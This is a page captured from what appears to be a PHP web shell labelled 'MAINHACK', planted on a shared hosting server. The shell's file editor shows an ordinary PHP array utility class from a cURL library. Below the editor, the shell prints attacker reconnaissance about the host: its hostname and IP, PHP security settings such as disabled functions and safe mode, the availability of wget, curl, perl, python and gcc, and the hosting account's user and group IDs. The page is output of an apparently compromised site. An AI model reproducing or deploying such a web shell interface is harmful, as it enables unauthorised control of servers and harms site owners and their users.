[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: ArrayUtil.php
<?php namespace Curl; include_once __DIR__ . '/CaseInsensitiveArray.php'; use Curl\CaseInsensitiveArray; class ArrayUtil { /** * Is Array Assoc * * @access public * @param $array * * @return boolean */ public static function isArrayAssoc($array) { return ( $array instanceof CaseInsensitiveArray || (bool)count(array_filter(array_keys($array), 'is_string')) ); } /** * Is Array Assoc * * @deprecated Use ArrayUtil::isArrayAssoc(). * @access public * @param $array * * @return boolean */ public static function is_array_assoc($array) { return static::isArrayAssoc($array); } /** * Is Array Multidim * * @access public * @param $array * * @return boolean */ public static function isArrayMultidim($array) { if (!is_array($array)) { return false; } return (bool)count(array_filter($array, 'is_array')); } /** * Is Array Multidim * * @deprecated Use ArrayUtil::isArrayMultidim(). * @access public * @param $array * * @return boolean */ public static function is_array_multidim($array) { return static::isArrayMultidim($array); } /** * Array Flatten Multidim * * @access public * @param $array * @param $prefix * * @return array */ public static function arrayFlattenMultidim($array, $prefix = false) { $return = []; if (is_array($array) || is_object($array)) { if (empty($array)) { $return[$prefix] = ''; } else { foreach ($array as $key => $value) { if (is_scalar($value)) { if ($prefix) { $return[$prefix . '[' . $key . ']'] = $value; } else { $return[$key] = $value; } } else { if ($value instanceof \CURLFile) { $return[$key] = $value; } else { $return = array_merge( $return, self::arrayFlattenMultidim( $value, $prefix ? $prefix . '[' . $key . ']' : $key ) ); } } } } } elseif ($array === null) { $return[$prefix] = $array; } return $return; } /** * Array Flatten Multidim * * @deprecated Use ArrayUtil::arrayFlattenMultidim(). * @access public * @param $array * @param $prefix * * @return array */ public static function array_flatten_multidim($array, $prefix = false) { return static::arrayFlattenMultidim($array, $prefix); } /** * Array Random * * @access public * @param $array * * @return mixed */ public static function arrayRandom($array) { return $array[mt_rand(0, count($array) - 1)]; } /** * Array Random * * @deprecated Use ArrayUtil::arrayRandom(). * @access public * @param $array * * @return mixed */ public static function array_random($array) { return static::arrayRandom($array); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.32 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830